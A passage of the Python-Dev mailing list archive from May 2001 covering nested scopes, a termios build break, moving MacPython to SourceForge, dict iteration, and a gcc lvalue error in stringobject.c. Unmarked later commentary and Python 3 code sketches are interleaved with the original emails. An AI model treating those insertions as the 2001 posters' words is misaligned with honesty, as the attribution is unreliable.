this before I check it in.

Current CVS Python contains a dormant test case.  There's a patch attached to
the bug report that activates the test case, and tries to repair the problem.
After applying the patch, the fix works if and only if test_import passes
both after deleting all .pyc/.pyo files first and when run a second time
w/o deleting .pyc/.pyo.

Works on Win98SE, but you may have already guessed that <wink>.
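One way a float constant can lose precision on its way through a .pyc is being written out as text with too few significant digits. The sketch below assumes that mechanism for illustration only (the bug report itself isn't quoted here): 2001-era Python's str() formatted floats with 12 significant digits, while 17 always suffice to round-trip an IEEE-754 double.

```python
import marshal

x = 0.1 + 0.2          # 0.30000000000000004, not exactly 0.3

# 12 significant digits (what str() used back then) lose information:
short = "%.12g" % x
assert float(short) != x

# 17 significant digits always round-trip an IEEE-754 double:
full = "%.17g" % x
assert float(full) == x

# Modern marshal (the .pyc serializer) stores floats in binary, so it round-trips:
assert marshal.loads(marshal.dumps(x)) == x
```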


From tim.one@home.com  Tue May  8 05:52:37 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 8 May 2001 00:52:37 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: <E14wyrU-0005qO-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>

[Jeremy Hylton, on python-checkins]
> ...
> XXX When should nested scopes be made non-optional on the trunk?

Since the trunk is 2.2a0, as soon as it's convenient.  Like, say, if you're
having trouble sleeping tonight <wink>.


From thomas@xs4all.net  Tue May  8 11:14:20 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 12:14:20 +0200
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <15090.64389.746625.331215@anthem.wooz.org>; from barry@digicool.com on Fri, May 04, 2001 at 02:57:09PM -0400
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> <20010503131714.D21814@inetnebr.com> <15090.64389.746625.331215@anthem.wooz.org>
Message-ID: <20010508121420.Y16486@xs4all.nl>

On Fri, May 04, 2001 at 02:57:09PM -0400, Barry A. Warsaw wrote:

> >>>>> "JE" == Jeff Epler <jepler@inetnebr.com> writes:

>     | Why not let us spell this as:
>     | 	class X(Y):
>     | 		from Y import foo as _sfoo, bar as _sbar
>     | 		...

>     NS> This already has a meaning in Python.  Paul's suggested syntax
>     NS> is pretty neat, IMHO.

> Not if Y is a class though, right?  That would currently raise an
> ImportError, ...

Nope:

>>> class string:
...     pass
... 
>>> from string import split
>>> string
<class __main__.string at 8072e90>
>>> 

That could be considered a misfeature for more than one reason (like
importing from non-module objects, which you now do by inserting the object
into sys.modules) but can't be fixed without breaking backward
compatibility, except by inventing new syntax.
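A minimal Python 3 sketch of the point above, using a hypothetical class named Toolbox: the import statement looks for a *module* and ignores a same-named class in the current namespace, until the class object itself is registered in sys.modules.

```python
import sys

class Toolbox:
    """An ordinary class, not a module (hypothetical example)."""
    @staticmethod
    def hello():
        return "hello from a class"

# The import statement ignores the class bound in this namespace and
# searches for a module named 'Toolbox', which doesn't exist.
try:
    from Toolbox import hello
except ImportError:
    found_before = False
else:
    found_before = True

# Importing from a non-module object works once it is in sys.modules,
# because the import statement consults sys.modules first.
sys.modules["Toolbox"] = Toolbox
from Toolbox import hello
print(found_before, hello())
```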

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From Mark.Favas@per.dem.csiro.au  Tue May  8 11:34:37 2001
From: Mark.Favas@per.dem.csiro.au (Favas, Mark (EM, Floreat))
Date: Tue, 8 May 2001 18:34:37 +0800
Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD
Message-ID: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU>

A change to termios.c in the last couple of days to #include termio.h as
well as termios.h breaks the build on FreeBSD, which has only termios.h -
needs an autoconf test? There'll probably be other similar systems.

Cheers, Mark 


From thomas@xs4all.net  Tue May  8 12:36:38 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 13:36:38 +0200
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEIIKAAA.tim.one@home.com>; from tim.one@home.com on Sun, May 06, 2001 at 02:15:57PM -0400
References: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> <LNBBLJKPBEHFEDALKOLCKEIIKAAA.tim.one@home.com>
Message-ID: <20010508133638.Z16486@xs4all.nl>

On Sun, May 06, 2001 at 02:15:57PM -0400, Tim Peters wrote:

> Given the new dict iterators in 2.2, there's an easier fast way that doesn't
> mutate the dict even under the covers:

> def arb(dict):
>     if dict:
>         return dict.iteritems().next()
>     raise KeyError("arb passed an empty dict")

You probably want:

arb = dict.iteritems().next

so that you don't keep on returning the same key,value pair.

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From thomas@xs4all.net  Tue May  8 13:10:00 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 14:10:00 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:39:43AM +0200
References: <20010507093944.1A340312BA0@snelboot.oratrix.nl>
Message-ID: <20010508141000.A16486@xs4all.nl>

On Mon, May 07, 2001 at 11:39:43AM +0200, Jack Jansen wrote:

> The Mac specific stuff for Python is all concentrated in a single subtree Mac 
> of the main Python tree (the subtree has its own hierarchy of 
> Python/Modules/Lib/etc directories), so putting it in the main repository 
> should not pollute the filenamespace all that much. It would also have the 
> advantage that a single "cvs update" would update everything (whereas the 
> current situation for Mac developers, where Python/Mac is from a different 
> CVSROOT than Python, does not have that advantage). The downside is that 
> everyone who does a full checkout of the tree would get an extra 1000 or so 
> files on their disk that are pretty useless unless they have a mac.

I'd say merge, except that the number '1000' is very large. Is it really
1000 ? The current Python tree contains only 304 .c and .h files, about 1000
.py files spread out over the tree (567 of which in Lib, the rest in
Demo/Tools) and obviously some misc files and CVS stuff, for a total of
around 2500 files. Is that 1000 a real number ? No temp files,
auto-generated files, .o files etc ? How large are they ? (the average size
in the current CVS tree is about 10k)

I'd probably still say 'merge', I'm just curious where the large number of
files comes from. Is it to keep the changes to the original files minimal ?
Given the number of platform-dependent #ifdefs and differently-defined
macros we're using now, I don't see why some of those changes couldn't be
moved into the original files, if that's the case.

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From thomas@xs4all.net  Tue May  8 13:13:39 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 14:13:39 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010507131718.C22B7312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:17:18PM +0200
References: <guido@digicool.com> <20010507131718.C22B7312BA1@snelboot.oratrix.nl>
Message-ID: <20010508141339.B16486@xs4all.nl>

On Mon, May 07, 2001 at 03:17:18PM +0200, Jack Jansen wrote:

> > We have platform-specific subdirectories for so many projects that
> > it's a shame we don't have the Mac code in there as well!

> Great! I'll pack up my repository and send it to the 
> sourceforge-powers-that-be shortly. The write permission for other MacPython 
> developers shouldn't be a problem, I think Just is currently the only person 
> with write permission (but I have to check).

That doesn't mean there isn't a problem. Just doesn't have write access :)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From guido@digicool.com  Tue May  8 14:35:50 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 08 May 2001 08:35:50 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: Your message of "Tue, 08 May 2001 00:52:37 -0400."
 <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>
Message-ID: <200105081335.IAA28415@cj20424-a.reston1.va.home.com>

> [Jeremy Hylton, on python-checkins]
> > ...
> > XXX When should nested scopes be made non-optional on the trunk?

[Tim]
> Since the trunk is 2.2a0, as soon as it's convenient.  Like, say, if you're
> having trouble sleeping tonight <wink>.

+1.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Tue May  8 14:41:42 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 08 May 2001 08:41:42 -0500
Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD
In-Reply-To: Your message of "Tue, 08 May 2001 18:34:37 +0800."
 <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU>
References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU>
Message-ID: <200105081341.IAA28486@cj20424-a.reston1.va.home.com>

> A change to termios.c in the last couple of days to #include termio.h as
> well as termios.h breaks the build on FreeBSD, which has only termios.h -
> needs an autoconf test? There'll probably be other similar systems.

Frankly, I don't see the point of including termio.h at all -- it
seems to be a backwards compatibility file.

Mark, can you please enter this in the bug database and assign it to
whoever checked in the change? :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas@python.ca  Tue May  8 15:05:01 2001
From: nas@python.ca (Neil Schemenauer)
Date: Tue, 8 May 2001 07:05:01 -0700
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>; from tim.one@home.com on Tue, May 08, 2001 at 12:52:37AM -0400
References: <E14wyrU-0005qO-00@usw-pr-cvs1.sourceforge.net> <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>
Message-ID: <20010508070501.A25794@glacier.fnational.com>

Tim Peters wrote:
> [Jeremy Hylton, on python-checkins]
> > ...
> > XXX When should nested scopes be made non-optional on the trunk?
> 
> Since the trunk is 2.2a0, as soon as it's convenient.  Like, say, if you're
> having trouble sleeping tonight <wink>.

Shouldn't the entry in the __future__ file be:

    nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0))

or am I misunderstanding something?

  Neil


From jack@oratrix.nl  Tue May  8 15:07:39 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Tue, 08 May 2001 16:07:39 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: Message by Thomas Wouters <thomas@xs4all.net> ,
 Tue, 8 May 2001 14:10:00 +0200 , <20010508141000.A16486@xs4all.nl>
Message-ID: <20010508140741.790E5379B72@snelboot.oratrix.nl>

> I'd say merge, except that the number '1000' is very large. Is it really
> 1000 ? The current Python tree contains only 304 .c and .h files, about 1000
> .py files spread out over the tree (567 of which in Lib, the rest in
> Demo/Tools) and obviously some misc files and CVS stuff, for a total of
> around 2500 files. Is that 1000 a real number ? No temp files,
> auto-generated files, .o files etc ? How large are they ? (the average size
> in the current CVS tree is about 10k)

It's actually 830 files. This is 320 .py files (130 in Lib, the rest in 
Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build 
system), 30 resource files and then assorted things (html documentation, 
scripts to drive the distribution builder, etc).

The .xml and .exp files and about 20 of the .c files are machine generated, so 
they could technically be left out of the repository. The generation process 
of these files is a bit painful, though, so I've added them as a convenience 
(the reasoning is a bit along the lines of the Grammar stuff of the core).

The one thing that I should do is clean out the "Unsupported" directory before 
doing the merge. It contains some stuff that is long dead. But then, it isn't 
all that many files.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From mwh@python.net  Tue May  8 15:41:45 2001
From: mwh@python.net (Michael Hudson)
Date: Tue, 8 May 2001 15:41:45 +0100 (BST)
Subject: [Python-Dev] Recent change to termios module breaks build on
 FreeBSD
Message-ID: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain>

Guido van Rossum <guido@digicool.com> writes:

> > A change to termios.c in the last couple of days to #include termio.h
> > as well as termios.h breaks the build on FreeBSD, which has only
> > termios.h - needs an autoconf test? There'll probably be other similar
> > systems.
>
> Frankly, I don't see the point of including termio.h at all -- it
> seems to be a backwards compatibility file.

If you don't include termio.h the build breaks on alpha/OSF1.  This
sounds to me like OSF1's headers are broken (you can't include
sys/ioctl.h without including termio.h first, it seems, or you get
complaints about struct termio being undefined).  So I'd suggest

+#ifdef __osf__
 #include <termio.h>
+#endif

and then see if the build breaks anywhere else (I love unix).

Using the sf compile farm, I've tested this on FreeBSD, Linux/x86,
Linux/PPC, OSF1/alpha, Linux/sparc, Solaris/sparc (using gcc; cc gives
a pile of warnings from redefined macros and then dies 'cause it can't
find a valid license file).

So we might need some more magic for solaris using cc.

Cheers,
M.

-- 
  Imagine if every Thursday your shoes exploded if you tied them
  the usual way.  This happens to us all the time with computers,
  and nobody thinks of complaining.                     -- Jeff Raskin


From fdrake@acm.org  Tue May  8 15:45:18 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Tue, 8 May 2001 10:45:18 -0400 (EDT)
Subject: [Python-Dev] Recent change to termios module breaks build on
 FreeBSD
In-Reply-To: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain>
References: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain>
Message-ID: <15096.1662.137269.996490@cj42289-a.reston1.va.home.com>

Michael Hudson writes:
 > If you don't include termio.h the build breaks on alpha/OSF1.  This
 > sounds to me like OSF1's headers are broken (you can't include
 > sys/ioctl.h without including termio.h first, it seems, or you get
 > complaints about struct termio being undefined).  So I'd suggest
 > 
 > +#ifdef __osf__
 >  #include <termio.h>
 > +#endif
 > 
 > and then see if the build breaks anywhere else (I love unix).

  Does it make more sense to do this or to test for termio.h in
configure?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From m.favas@per.dem.csiro.au  Tue May  8 15:47:39 2001
From: m.favas@per.dem.csiro.au (Mark Favas)
Date: Tue, 08 May 2001 22:47:39 +0800
Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD
References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> <200105081341.IAA28486@cj20424-a.reston1.va.home.com>
Message-ID: <3AF8070B.87D3C5B2@per.dem.csiro.au>

Guido van Rossum wrote:
> 
> > A change to termios.c in the last couple of days to #include termio.h as
> > well as termios.h breaks the build on FreeBSD, which has only termios.h -
> > needs an autoconf test? There'll probably be other similar systems.
> 
> Frankly, I don't see the point of including termio.h at all -- it
> seems to be a backwards compatibility file.
> 
> Mark, can you please enter this in the bug database and assign it to
> whoever checked in the change? :-)

Done - Michael Hudson wrote the patch, so I've assigned the bug to Fred
Drake <grin>

-- 
Mark Favas  -   m.favas@per.dem.csiro.au
CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA


From thomas@xs4all.net  Tue May  8 16:52:49 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 17:52:49 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl>; from jack@oratrix.nl on Tue, May 08, 2001 at 04:07:39PM +0200
References: <thomas@xs4all.net> <20010508140741.790E5379B72@snelboot.oratrix.nl>
Message-ID: <20010508175248.E16486@xs4all.nl>

On Tue, May 08, 2001 at 04:07:39PM +0200, Jack Jansen wrote:

[ Jack wants to add the +/- 1000 extra files from the MacPython source tree
  to the Python CVS repository ]

> It's actually 830 files. This is 320 .py files (130 in Lib, the rest in 
> Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build 
> system), 30 resource files and then assorted things (html documentation, 
> scripts to drive the distribution builder, etc).

I'd say merge it. If there had been decent CVS clients for the mac when you
started, those files would have been in the CVS tree already. 

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From skip@pobox.com (Skip Montanaro)  Tue May  8 19:22:17 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Tue, 8 May 2001 13:22:17 -0500
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl>
References: <thomas@xs4all.net>
 <20010508141000.A16486@xs4all.nl>
 <20010508140741.790E5379B72@snelboot.oratrix.nl>
Message-ID: <15096.14681.773554.729550@beluga.mojam.com>

    Jack> It's actually 830 files. ... 120 .c/.h files ...

How many of those 120 files are variants of existing source files that (in
theory) could be merged with their mainline counterparts?

Skip


From mwh@python.net  Tue May  8 23:27:59 2001
From: mwh@python.net (Michael Hudson)
Date: 08 May 2001 23:27:59 +0100
Subject: [Python-Dev] Recent change to termios module breaks build on  FreeBSD
In-Reply-To: "Fred L. Drake, Jr."'s message of "Tue, 8 May 2001 10:45:18 -0400 (EDT)"
References: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain> <15096.1662.137269.996490@cj42289-a.reston1.va.home.com>
Message-ID: <m3pudjscgg.fsf@atrus.jesus.cam.ac.uk>

"Fred L. Drake, Jr." <fdrake@acm.org> writes:

> Michael Hudson writes:
>  > If you don't include termio.h the build breaks on alpha/OSF1.  This
>  > sounds to me like OSF1's headers are broken (you can't include
>  > sys/ioctl.h without including termio.h first, it seems, or you get
>  > complaints about struct termio being undefined).  So I'd suggest
>  > 
>  > +#ifdef __osf__
>  >  #include <termio.h>
>  > +#endif
>  > 
>  > and then see if the build breaks anywhere else (I love unix).
> 
>   Does it make more sense to do this or to test for termio.h in
> configure?

If you're asking *me*, I have no idea.  I'd hope that no system would
be as broken as osf1 is in this regard, but then I'd have hoped that
osf1 wasn't this broken too...

I guess the test in configure is "safer" in some sense.  Getting this
perfectly right would probably require more autoconf hackery than one
can possibly imagine... ncurses generates an awk script from
./configure that is then run to produce term.h, but I'm not sure that
all of that is devoted to including the right headers.

can-we-just-have-TERMIOS-back?-ly y'rs
M.

-- 
  Good? Bad? Strap him into the IETF-approved witch-dunking
  apparatus immediately!                        -- NTK now, 21/07/2000


From mark@per.dem.csiro.au  Wed May  9 01:53:01 2001
From: mark@per.dem.csiro.au (Mark Favas)
Date: Wed, 9 May 101 13:52:09 +0800 (WST)
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
Message-ID: <200105090552.NAA08038@erebus.per.dem.csiro.au>

Changes in the last few hours (hi Tim!) to stringobject compile (I'd guess) on
MS (and on Compaq's Tru64 compiler), but produce the following with gcc on
Solaris and FreeBSD:

gcc -c -g -O2 -Wall -Wstrict-prototypes -I. -I./Include -DHAVE_CONFIG_H  -o Objects/stringobject.o Objects/stringobject.c
Objects/stringobject.c: In function `PyString_FromStringAndSize':
Objects/stringobject.c:76: invalid lvalue in unary `&'
Objects/stringobject.c:80: invalid lvalue in unary `&'
Objects/stringobject.c: In function `PyString_FromString':
Objects/stringobject.c:130: invalid lvalue in unary `&'
Objects/stringobject.c:134: invalid lvalue in unary `&'
*** Error code 1


-- 
Email - m.favas@per.dem.csiro.au        Postal - Mark C Favas
Phone - +61 8 9333 6268, 041 892 6074            CSIRO Exploration & Mining
Fax   - +61 8 9387 8642                          Private Bag No 5
                                                 Wembley, Western Australia 6913


From tim.one@home.com  Wed May  9 07:48:12 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 02:48:12 -0400
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
In-Reply-To: <20010508133638.Z16486@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEAAKBAA.tim.one@home.com>

[Tim]
> Given the new dict iterators in 2.2, there's an easier fast way
> that doesn't mutate the dict even under the covers:
>
> def arb(dict):
>     if dict:
>         return dict.iteritems().next()
>     raise KeyError("arb passed an empty dict")

[Thomas Wouters]
> You probably want:
>
> arb = dict.iteritems().next
>
> so that you don't keep on returning the same key,value pair.

No, I would not want that.  If "arbitrary" suffices, then by defn. *any*
element is "good enough".  If it's not good enough to get the same one back
every time, then I want a stronger guarantee about what arb() returns than
the inexplicable behavior of repeated calls to dict.iteritems().next in the
presence of dict mutation.  But as I've said several times before <wink>, I'm
still asking for an algorithm where arb() is actually useful (as opposed to
.popitem(), which is dead easy to explain in the presence of mutation; your
version of arb() can, e.g., return a given entry more than once, may skip
entries, and may raise StopIteration with unexamined entries remaining in the
dict).
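To make the two spellings concrete, here is a minimal Python 3 sketch (d.items() plays the role of 2.2's dict.iteritems()). Tim's arb() builds a fresh iterator per call; Thomas's variant binds one iterator that advances, runs out, and misbehaves under mutation. Modern CPython detects a size change and raises RuntimeError rather than silently skipping or repeating entries.

```python
def arb(d):
    """Return an arbitrary (key, value) pair without mutating d.

    Python 3 spelling of Tim's version: a fresh iterator on every call.
    """
    if d:
        return next(iter(d.items()))
    raise KeyError("arb passed an empty dict")


d = {"a": 1, "b": 2}
print(arb(d), arb(d))        # the same pair both times

# Thomas's variant: one bound iterator that advances on each call.
step = iter(d.items()).__next__
print(step(), step())        # two different pairs
try:
    step()
except StopIteration:
    print("exhausted")       # ...and then it simply runs out

# Mutating the dict while such an iterator is live:
step = iter(d.items()).__next__
step()
d["c"] = 3
try:
    step()
except RuntimeError as exc:
    print("RuntimeError:", exc)
```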

not-inclined-to-accept-shallow-comfort-at-the-cost-of-deep-confusion-ly
    y'rs  - tim


From tim.one@home.com  Wed May  9 08:42:00 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 03:42:00 -0400
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: <200105090552.NAA08038@erebus.per.dem.csiro.au>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEADKBAA.tim.one@home.com>

[Mark Favas]
> Changes in the last few hours (hi Tim!)

Hi Mark!  Sorry about that!

> to stringobject compile (I'd guess) on MS

You guess right -- and under two flavors of Windows <wink>.

> (and on Compaq's Tru64 compiler),

Figures.

> but produce the following with gcc on Solaris and FreeBSD:
>
> gcc -c -g -O2 -Wall -Wstrict-prototypes -I. -I./Include
> -DHAVE_CONFIG_H  -o Objects/stringobject.o Objects/stringobject.c
> Objects/stringobject.c: In function `PyString_FromStringAndSize':
> Objects/stringobject.c:76: invalid lvalue in unary `&'
> Objects/stringobject.c:80: invalid lvalue in unary `&'
> Objects/stringobject.c: In function `PyString_FromString':
> Objects/stringobject.c:130: invalid lvalue in unary `&'
> Objects/stringobject.c:134: invalid lvalue in unary `&'
> *** Error code 1

Fair enough:  I tried to use a cast as an lvalue in those 4 places, all of
the form:

    		PyString_InternInPlace(&(PyObject *)op);

where op is declared PyStringObject*.  Strictly speaking, that ain't legal,
but changing it to:

		PyObject *t = (PyObject *)op;
    		PyString_InternInPlace(&t);

is.  You may wonder WTF the difference is.  That's easy:  the rewrite doesn't
use a cast expression as an lvalue <wink>.
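One subtlety of the rewrite: PyString_InternInPlace() may replace the object it is handed with an already-interned equal string, so after the call the live pointer is in t and op would need refreshing from it (op = (PyStringObject *)t;). That is presumably the "correct semantics" restored by the follow-up checkin later in this thread; the diff itself isn't shown here. As a Python-level analogy only (not the C code), sys.intern has the same contract but returns the canonical object, so the caller must rebind:

```python
import sys

# Build two equal strings at run time so neither is a shared constant.
a = "".join(["python", "-dev"])
b = "".join(["python", "-dev"])
assert a == b and a is not b

a = sys.intern(a)   # rebind: a now names the canonical interned copy
b = sys.intern(b)   # b's old object is dropped; the canonical one is returned
assert a is b       # both names now share one object
```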

sensible-or-not-it's-checked-in-so-please-try-again-ly y'rs  - tim


From jack@oratrix.nl  Wed May  9 09:16:29 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Wed, 09 May 2001 10:16:29 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: Message by <skip@pobox.com> ,
 Tue, 8 May 2001 13:22:17 -0500 , <15096.14681.773554.729550@beluga.mojam.com>
Message-ID: <20010509081630.84D8D303181@snelboot.oratrix.nl>

> 
>     Jack> It's actually 830 files. ... 120 .c/.h files ...
> 
> How many of those 120 files are variants of existing source files that (in
> theory) could be merged with their mainline counterparts?

None (unless you would count macmodule.c as a variant of posixmodule.c). I 
think macmain.c started out as a clone of pythonmain.c, but I think they're 
too different to merge (but I'll have a look).

Hmm, now that I think of it macmodule and posixmodule could possibly be 
merged.

It's fun to see how many statistics I've gathered about MacPython in just a few
days :-)
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From tim.one@home.com  Wed May  9 09:20:12 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 04:20:12 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: <20010508070501.A25794@glacier.fnational.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEAGKBAA.tim.one@home.com>

[Neil Schemenauer]
> Shouldn't the entry in the __future__ file be:
>
>   nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0))
>
> or am I misunderstanding something?

Until nested_scopes *is* the rule, the Mandatory Release field is just a
guess about the future.  Changing it to (2, 2, 0, "alpha", 0) right *now*
would be wrong, since it would change it from a guess about the future to a
false statement about the present.  It must be changed when nested_scopes
become mandatory; it needn't be changed before then (unless we delay making
them mandatory beyond 2.2 final), although if somebody thinks they have a
good use for moving the guess up, fine, just so long as they don't move the
guess to or before 2.2a0.


From thomas@xs4all.net  Wed May  9 09:58:50 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Wed, 9 May 2001 10:58:50 +0200
Subject: [Python-Dev] Crashes w/ CVS tree
Message-ID: <20010509105850.F16486@xs4all.nl>

I'm getting a crash with Python compiled from a freshly updated CVS tree,
even when running just './python'. It crashes during the loading of os.pyc.
It doesn't crash if I start python with -S, and it doesn't crash if I remove
*.pyc first:

centurion:~/python/python-2.2/dist/src/linux> ./python 
Python 2.2a0 (#4, May  9 2001, 09:52:29) 
[GCC 2.95.4 20010506 (Debian prerelease)] on linux2
Type "copyright", "credits" or "license" for more information.
>>> 
centurion:~/python/python-2.2/dist/src/linux> ./python
Segmentation fault

If I remove os.pyc only, I get the enlightening:

Fatal Python error: PyString_InternInPlace: strings only please!
Abort (core dumped)

I would blame Tim <wink>, except that when examining the corefile I found
some pointers to other causes. The 'original' crash occurs because
cmp_outcome() is passed an invalid PyObject, with most of its function slots
pointing to the middle of the glibc-internal '__morecore()' function.
Examining the stack off of which the invalid item was popped reveals that
the next-to-last item is an iterator. So maybe I should blame Guido instead,
either for the iterator or for rich comparisons ;)

From what I can tell, the segfault happens in os.py, here:

    import posixpath
    path = posixpath
    del posixpath

    import posix
    __all__.extend(_get_exports_list(posix))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    del posix

elif 'nt' in _names:

That is, after importing posix, while getting the exports lists. Which, in
the case of posixmodule, uses a list comprehension.... which now uses an
iterator... so maybe it's Tim after all. :-)
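For context, the helper in question collects a module's public names. In current CPython's os.py, _get_exports_list looks roughly like the function below (the 2001 version may differ). Here it is renamed get_exports_list and exercised on a hypothetical stand-in module built with types.ModuleType.

```python
import types

def get_exports_list(module):
    """Prefer the module's __all__; otherwise list names not starting with '_'."""
    try:
        return list(module.__all__)
    except AttributeError:
        # The list-comprehension branch: keep only public names.
        return [n for n in dir(module) if n[0] != "_"]

# Hypothetical stand-in for the posix module.
fake = types.ModuleType("fake_posix")
fake.getcwd = lambda: "/"
fake._helper = None
print(get_exports_list(fake))        # ['getcwd']

fake.__all__ = ("getcwd", "listdir")
print(get_exports_list(fake))        # ['getcwd', 'listdir']
```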

Unfortunately, I don't have time to look at it right now (meetings,
meetings.) If no one is looking at it by the time I'm back and free, I'll
hunt some more ;)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From thomas@xs4all.net  Wed May  9 10:14:32 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Wed, 9 May 2001 11:14:32 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects stringobject.c,2.111,2.112
In-Reply-To: <E14xPZ5-0002g4-00@usw-pr-cvs1.sourceforge.net>; from tim_one@users.sourceforge.net on Wed, May 09, 2001 at 01:43:23AM -0700
References: <20010509105850.F16486@xs4all.nl> <E14xPZ5-0002g4-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <20010509111432.G16486@xs4all.nl>

On Wed, May 09, 2001 at 01:43:23AM -0700, Tim Peters wrote:
> Update of /cvsroot/python/python/dist/src/Objects
> In directory usw-pr-cvs1:/tmp/cvs-serv10106/python/dist/src/Objects
> 
> Modified Files:
> 	stringobject.c 
> Log Message:
> Sheesh -- repair the dodge around "cast isn't an lvalue" complaints to
> restore correct semantics.

This apparently fixed my problem:

On Wed, May 09, 2001 at 10:58:50AM +0200, Thomas Wouters wrote:
> 
> I'm getting a crash with Python compiled from a freshly updated CVS tree,
> even when running just './python'. It crashes during the loading of os.pyc.
> It doesn't crash if I start python with -S, and it doesn't crash if I remove
> *.pyc first:

That ought to teach me to spend my morning doing something fun -- it turned
out to be useless :-)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From tim.one@home.com  Wed May  9 10:29:31 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 05:29:31 -0400
